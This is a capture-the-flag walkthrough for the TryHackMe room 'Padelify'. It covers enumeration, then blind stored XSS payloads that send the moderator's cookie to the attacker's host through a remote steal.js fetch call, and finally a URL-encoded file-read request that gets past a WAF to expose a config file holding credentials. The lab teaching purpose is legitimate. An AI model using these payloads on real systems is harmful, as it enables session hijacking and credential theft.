Room

https://tryhackme.com/room/padelify

Enumeration

The description of this room suggests it is a web server hosted on port 80, but let's run nmap just to make sure.

nmap -sC -sV -sT -p- 10.64.178.173

As expected, the only thing open is a web server.

None

The next step is to enumerate the directories. For this, we will be using dirsearch.

dirsearch -u <http://10.64.178.173/>
None
note: dirsearch automatically adds a real user agent. If you use something like Gobuster, you will have to add it manually

When we visit the site, we are greeted with a registration page.

None

Let's check the log and config paths:

None

app.conf is blocked by the WAF, so we can assume creds are in there.

The logs path has a single file, error.log in it:

None

This confirms the existence of creds in the config file.

Moderator Flag

Pro tip: When a ctf has a site saying a moderator will review something, there is a 95% chance you can steal the cookie using Stored XSS.

To test for this possibility, we first need to set up a web server using python. Since the moderator is checking the requests, the XSS will probably be blind.

python3 -m http.server
None

Now we need to confirm if it is even possible. To do this we can have a simple payload like this:

<script src="<http://10.64.80.99:8000>"></script>

We can input this in the register form as shown:

None

When we submit the registration, we can check the server to see if something has happened to confirm XSS.

None

As we can see, something has happened, now we can try finding ways to weaponize this.

Weaponizing the XSS

Now we have confirmed that the web app is vulnerable to XSS, we can try finding ways to use the XSS to gain access to the admin panel. Let's try a basic payload to steal cookies:

<img src=x onerror="location='<http://10.64.80.99:8000/?c='+document.cookie>">
None

Well, that didn't work. Since the previous <script src> worked earlier, we can try including a remote file using it.

Let's start by writing simple JS code to steal the cookie.

fetch('<http://10.64.80.99:6767/?c=>' + document.cookie);

We can now use XSS to try to exfiltrate the cookie:

<script src="<http://10.64.80.99:6767/steal.js>"></script>
None

We receive a connection back with the cookie.

None

Next, replace the cookie.

None

And we are in!

None

Admin Flag

After looking around for a bit, we find a possible SSRF vector.

None

Just inputting config/app.conf gets us blocked.

After playing around a bit, we find url encoding that works:

http://10.64.178.172/live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66
None

Now we can login with the new info:

None

And we have the flag!

None
None